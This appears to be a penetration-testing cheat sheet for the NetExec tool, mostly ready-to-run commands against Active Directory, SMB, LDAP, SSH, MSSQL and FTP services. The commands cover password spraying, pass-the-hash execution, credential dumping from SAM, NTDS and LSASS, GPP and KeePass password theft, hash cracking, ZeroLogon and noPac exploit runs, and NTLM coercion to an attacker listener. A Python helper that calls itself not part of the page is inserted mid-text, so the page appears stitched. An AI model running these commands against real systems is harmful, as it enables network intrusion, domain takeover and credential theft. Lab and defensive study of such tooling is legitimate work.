
NetExec
NetExec (nxc) is a network service exploitation tool that helps automate assessing the security of large networks. Check out its amazing and ever-evolving wiki page! You can view its usage in almost any of the AD-related boxes.
SMB
Enumeration
Enumerate domain/local users:
# List domain users
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --users
# List local users
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --users --local-auth
# Create a users list from nxc's output
$ nxc smb <target> -u <user> -p <pass> --users | awk '$1 == "SMB" && $5 != "[+]" && $5 != "-Username-" && $5 != "[*]" && $5 != "Guest" && $5 != "krbtgt" {print $5}' > domain_users
Domain users can also be enumerated via a RID brute-forcing attack:
# Brute-force RIDs (default up to 4000)
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --rid-brute <max-rid>
# Create a users list from nxc's output
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --rid-brute <max-rid> > nxc_users
# Keep only user objects (SidTypeUser) and strip the DOMAIN\ prefix
cat nxc_users | awk '$7 == "(SidTypeUser)" {print $6}' | awk -F'\\' '{print $2}' > domain_users
Enumerate domain/local hosts:
# List domain hosts
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --computers
# List local hosts
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --computers --local-auth
# List domain groups
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --groups
# List local groups
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --local-groups
# List active sessions
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --sessions
# List logged on users
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --loggedon-users
# List the domain's password policy
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --pass-pol
Password Spray
$ nxc smb <target> -u <user> -p <pass> -d <domain> --continue-on-success
If the results include the domain, e.g. (secura.yzx) → a domain account.
...
SMB 192.168.X.97 445 DC01 [+] secura.yzx\bob:Pass123!
If it has (Pwn3d!) at the end → Local Administrator account.
...
SMB 192.168.X.95 445 SECURE [+] secura.yzx\bob:Pass123! (Pwn3d!)
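Parsing nxc output with awk, as in the --rid-brute and password-spray snippets above, breaks on names containing spaces and needs per-column tweaks. The following Python helper is an added example (not part of NetExec or of this page) that parses both authentication result lines, including the (Pwn3d!) marker, and --rid-brute rows; the sample output is constructed with made-up hosts and accounts.

```python
import re

# Constructed sample of `nxc smb` output (hosts and accounts are made up);
# it mixes password-spray result lines with --rid-brute rows.
SAMPLE_OUTPUT = """\
SMB 192.168.1.97 445 DC01 [+] secura.yzx\\bob:Pass123!
SMB 192.168.1.95 445 SECURE [+] secura.yzx\\bob:Pass123! (Pwn3d!)
SMB 192.168.1.96 445 WS01 [-] WS01\\bob:Pass123! STATUS_LOGON_FAILURE
SMB 192.168.1.97 445 DC01 500: SECURA\\Administrator (SidTypeUser)
SMB 192.168.1.97 445 DC01 513: SECURA\\Domain Users (SidTypeGroup)
SMB 192.168.1.97 445 DC01 1105: SECURA\\alice (SidTypeUser)
"""

# Authentication result: "[+]"/"[-]", REALM\user:secret, optional "(Pwn3d!)" marker.
AUTH_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+\d+\s+(?P<host>\S+)\s+\[(?P<status>[+-])\]\s+"
    r"(?P<realm>[^\\]+)\\(?P<user>[^:]+):(?P<secret>\S+)(?P<admin>\s+\(Pwn3d!\))?"
)
# --rid-brute row: "<rid>: REALM\<name> (SidTypeUser|SidTypeGroup|SidTypeAlias)".
RID_RE = re.compile(
    r"^SMB\s+\S+\s+\d+\s+\S+\s+(?P<rid>\d+):\s+(?P<realm>[^\\]+)\\"
    r"(?P<name>.+?)\s+\((?P<sidtype>SidType\w+)\)$"
)

def parse_auth(line: str):
    """Classify one authentication result line; returns None for any other line type."""
    m = AUTH_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"], "host": m["host"], "realm": m["realm"], "user": m["user"],
        "success": m["status"] == "+",
        # nxc appends "(Pwn3d!)" when the account is a local administrator on that host
        "local_admin": m["admin"] is not None,
        # the page's rule of thumb: a dotted realm (secura.yzx) means a domain account
        "scope": "domain" if "." in m["realm"] else "local",
    }

def rid_brute_users(lines: list) -> list:
    """Keep only user accounts from --rid-brute output (groups and aliases dropped).
    Unlike awk '{print $6}', names containing spaces ("Domain Users") are not split."""
    users = []
    for line in lines:
        m = RID_RE.match(line)
        if m and m["sidtype"] == "SidTypeUser":
            users.append(m["name"])
    return users
```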
RCE
NetExec uses impacket-psexec to perform the Pass-the-Hash attack:
# -x runs a cmd.exe command, -X a PowerShell command
nxc smb <target> -u <user> -H <hash> -X <command>
Spidering
# Only spider files, enable file content searching
nxc smb <ip> -u <user> -p <pass> --spider <share> --only-files --content
# Spider a specific directory
nxc smb <ip> -u <user> -p <pass> --spider <share> --spider-folder <folder>
# Match file names by pattern
nxc smb <ip> -u <user> -p <pass> --spider <share> --pattern txt
# Search file contents with a regex
nxc smb <ip> -u <user> -p <pass> --spider <share> --content --regex Encrypt
# Match everything, but only one directory level deep
nxc smb <ip> -u <user> -p <pass> --spider <share> --regex . --depth 1
List and dump all files from all readable shares:
nxc smb <ip> -u <user> -p <pass> -M spider_plus -o DOWNLOAD_FLAG=True
Upload/Download
If large files fail or error out, add --smb-timeout with a value greater than 2.
# Download a file from a share
nxc smb <ip> -u <user> -p <pass> --share <share> --get-file <\\path\\to\\file> <local-file>
# Upload a file to a share
nxc smb <ip> -u <user> -p <pass> --share <share> --put-file <local-file> <\\path\\to\\upload\\file>
Modules
# SAM
nxc smb <ip> -u <user> -p <pass> --sam
# NTDS
nxc smb <ip> -u <user> -p <pass> --ntds --user <user>
# LSA
nxc smb <ip> -u <user> -p <pass> --lsa
The hashes that start with $DCC2$ (dumped by --lsa) are Domain Cached Credentials; they are stronger than NTLM hashes and cannot be used for a PtH attack. To attempt cracking them, the domain and username prefix must be removed; only the value starting with $DCC2$ is required.
# Convert DCC2 hashes
$ cat MS01_10.129.204.133_2022-11-08_093944.cached | cut -d ":" -f 2 | tee hashes.txt
$DCC2$10240#julio#c2139497f24725b345aa1e23352481f3
$DCC2$10240#david#a8338587a1c6ee53624372572e39b93f
$DCC2$10240#john#fbdeac2c1d121818f75796cedd0caf0a
# Crack hashes
hashcat -m 2100 hashes.txt /usr/share/wordlists/rockyou.txt
Enumerate network interfaces:
# Via WMI
nxc smb <ip> -u <user> -p <pass> -M get_netconnections
# Via RPC
nxc smb <ip> -u <user> -p <pass> -M ioxidresolver
Locate the KeePass configuration file:
nxc smb <ip> -u <user> -p <pass> -M keepass_discover
Check for credentials:
nxc smb <ip> -u <user> -p <pass> -M keepass_trigger -o ACTION=ALL KEEPASS_CONFIG_PATH=C:/Users/julio/AppData/Roaming/KeePass/KeePass.config.xml
Check /tmp/export.xml afterwards.
Retrieve the plaintext password of accounts pushed through GPPs (Group Policy Preferences):
nxc smb <ip> -u <user> -p <pass> -M gpp_password
Search registry.xml files for autologin information:
nxc smb <ip> -u <user> -p <pass> -M gpp_autologin
Enable RDP:
nxc smb <ip> -u <user> -p <pass> -M rdp -o ACTION=enable
lsassy (Python-based) uses impacket to read the LSASS dump and pypykatz to extract credentials:
nxc smb <ip> -u <user> -p <pass> -M lsassy
procdump uses the Sysinternals procdump to create the LSASS dump and pypykatz to extract credentials:
nxc smb <ip> -u <user> -p <pass> -M procdump
handlekatz uses cloned handles to create an obfuscated dump:
nxc smb <ip> -u <user> -p <pass> -M handlekatz
nanodump: opening a handle to LSASS can be detected, so it searches for existing handles and, if one is found, duplicates it and creates an LSASS minidump:
nxc smb <ip> -u <user> -p <pass> -M nanodump
Vulnerabilities
The most critical vulnerabilities: from no creds or low privileges straight to DA!
Check for all at once:
$ nxc smb dc01 -u <user> -p <pass> -M zerologon -M nopac -M printnightmare -M smbghost -M ms17-010
ZeroLogon (CVE-2020-1472) is a vulnerability in Microsoft's Netlogon protocol that lets an attacker with network access spoof a DC, reset its password to blank, and gain full domain admin rights without any credentials.
# Check for the vulnerability
nxc smb <dc-ip> -u '' -p '' -M zerologon
There is a PoC available:
# Exploit
./cve-2020-1472-exploit.py <DC-netBIOS-name> <dc-ip>
# Dump the administrator's hash
$ impacket-secretsdump -just-dc -no-pass <DC-netBIOS-name>\$@<dc-ip> -just-dc-user administrator
# Restore password
./restorepassword.py <DC-netBIOS-name>@<DC-IP> -target-ip <DC-IP> -hexpass <plaintext-machine-password>
noPAC is a vulnerability that lets an attacker with low-privileged domain access abuse misconfigured delegation and Kerberos to impersonate DCs and gain Domain Admin rights by forging a Privileged Attribute Certificate (PAC).
# Check for the vulnerability
$ nxc smb dc01 -u <user> -p <pass> -M nopac
There is a PoC available:
# Get the ST
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203
# Get RCE
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 -shell --impersonate administrator
# Dump hash
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump -just-dc-user cgdomain/krbtgt
PrintNightmare is a critical Windows Print Spooler vulnerability that allows an attacker with network or local access to execute code as SYSTEM on a DC or any Windows machine, enabling full takeover of the system and often the entire domain.
# Check for the vulnerability
nxc smb <ip> -u '' -p '' -M printnightmare
SMBGhost (CVE-2020-0796) is a critical vulnerability in the SMBv3 protocol that lets an attacker remotely execute code on vulnerable Windows systems by sending specially crafted packets, allowing full control without authentication. It targets any SMBv3-enabled host on the network, including DCs.
# Check for the vulnerability
nxc smb <ip> -u '' -p '' -M smbghost
MS17-010 is a critical Windows SMB vulnerability, aka EternalBlue, that allows remote attackers to execute code on vulnerable systems without authentication by exploiting flaws in SMBv1. It targets any SMBv1-enabled Windows host, including DCs, enabling full system takeover.
# Check for the vulnerability
nxc smb <ip> -u '' -p '' -M ms17-010
coerce_plus checks for authentication coercion vulnerabilities. By default the LISTENER IP is set to localhost, so no traffic will appear on the network.
The coerce_plus module includes:
PetitPotam: Coerces a DC to authenticate to an attacker via MS-EFSRPC, enabling NTLM relay attacks for domain takeover.
DFSCoerce: Tricks a DC into authenticating to the attacker via the Distributed File System service, enabling relay attacks.
PrinterBug: Exploits Windows Print Spooler to coerce authentication and enable NTLM relay attacks.
MSEven: Uses the Microsoft Exchange’s Web Services to force authentication, facilitating NTLM relay and privilege escalation.
ShadowCoerce: Coerces a domain host to authenticate by abusing the Shadow Copy service, enabling relay attacks.
# Check for the vulnerabilities
$ nxc smb dc01 -u <user> -p <pass> -M coerce_plus
If one or more are found, set the listener:
# Run all exploit methods at once
nxc smb <ip> -u '' -p '' -M coerce_plus -o LISTENER=<attacker-ip> ALWAYS=true
# Run a specific method
$ nxc smb dc01 -u <user> -p <pass> -M coerce_plus -o M=DFSCoerce L=<attacker-ip> ALWAYS=true
LDAP
Enumerate the description field of domain users (get-desc-users):
# Enumerate all users
nxc ldap DC01 -u '' -p '' -M get-desc-users
# Filter for a target string
nxc ldap DC01 -u '' -p '' -M get-desc-users -o FILTER='string'
# Look for passwords
nxc ldap DC01 -u '' -p '' -M get-desc-users -o PASSWORDPOLICY=True MINLENGTH=8
Execute the whoami command for any domain user:
nxc ldap dc01 -u x7331 -p Pass123! -M whoami -o USER=x1337
Obtain the domain's SID:
nxc ldap DC01 -u x7331 -p Pass123! --get-sid
# Read gMSA passwords (Kerberos authentication)
nxc ldap dc01.rebound.htb -u <user> -p <pass> -k --gmsa
# Query AD-integrated DNS records
nxc ldap <target> -u <user> -p <pass> -M get-network -o ALL=true
# Read LAPS passwords
nxc ldap <ip> -u <user> -p <pass> -M laps
# Read the DACL of a user object
nxc ldap <ip> -u <user> -p <pass> -M daclread -o TARGET=<user> ACTION=read
# DCSync rights
nxc ldap <ip> -u <user> -p <pass> -M daclread -o TARGET_DN="DC=inlanefreight,DC=htb" ACTION=read RIGHTS=DCSync
SSH
# Password authentication
nxc ssh <target> -u <user> -p <pass>
# Key authentication
nxc ssh <target> -u <user> -p '' --key-file root_id_rsa
# Port specification
nxc ssh <target> -u <user> -p <pass> --port 2222
# Try user/password pairs line by line (no cross-product)
nxc ssh <target> -u userfile -p passwordfile --no-bruteforce --continue-on-success
# Command execution
nxc ssh <target> -u <user> -p <pass> -x <command>
# Upload
nxc ssh <target> -u <user> -p <pass> --put-file file.txt /tmp/file.txt
# Download
nxc ssh <target> -u <user> -p <pass> --get-file /tmp/file.txt file.txt
MSSQL
Two methods can be used to authenticate to MSSQL: Windows (default) & local auth:
# 1. Windows auth
# With SMB port open
nxc mssql <target> -u <user> -p <pass>
# With SMB port closed
nxc mssql <target> -u <user> -p <pass> -d <domain>
# 2. Local auth
nxc mssql <target> -u <user> -p <pass> --local-auth
Ports can also be specified:
nxc mssql <target> -u <user> -p <pass> --port <port>
# Try user/password pairs line by line (no cross-product)
nxc mssql <target> -u userfile -p passwordfile --no-bruteforce --continue-on-success
From standard user to DBA:
# Check if possible
nxc mssql <ip> -u user -p password -M mssql_priv
# Impersonate
nxc mssql <ip> -u user -p password -M mssql_priv -o ACTION=privesc
# Rollback
nxc mssql <ip> -u user -p password -M mssql_priv -o ACTION=rollback
# Remote queries
nxc mssql <target> -u <user> -p <pass> --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'
# System RCE via xp_cmdshell
nxc mssql <target> -u <user> -p <pass> --local-auth -x whoami
# Upload
nxc mssql <target> -u <user> -p <pass> --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt
# Download
nxc mssql <target> -u <user> -p <pass> --get-file C:\\Windows\\Temp\\whoami.txt /tmp/file
FTP
# Try user/password pairs line by line (no cross-product)
nxc ftp <target> -u userfile -p passwordfile --no-bruteforce --continue-on-success
# List root directory
nxc ftp <target> -u <user> -p <pass> --ls
# List a specific directory
nxc ftp <target> -u <user> -p <pass> --ls <dir>
# Download
nxc ftp <target> -u <user> -p <pass> --get <file>
# Upload
nxc ftp <target> -u <user> -p <pass> --put <local-file> <remote-file>
Resources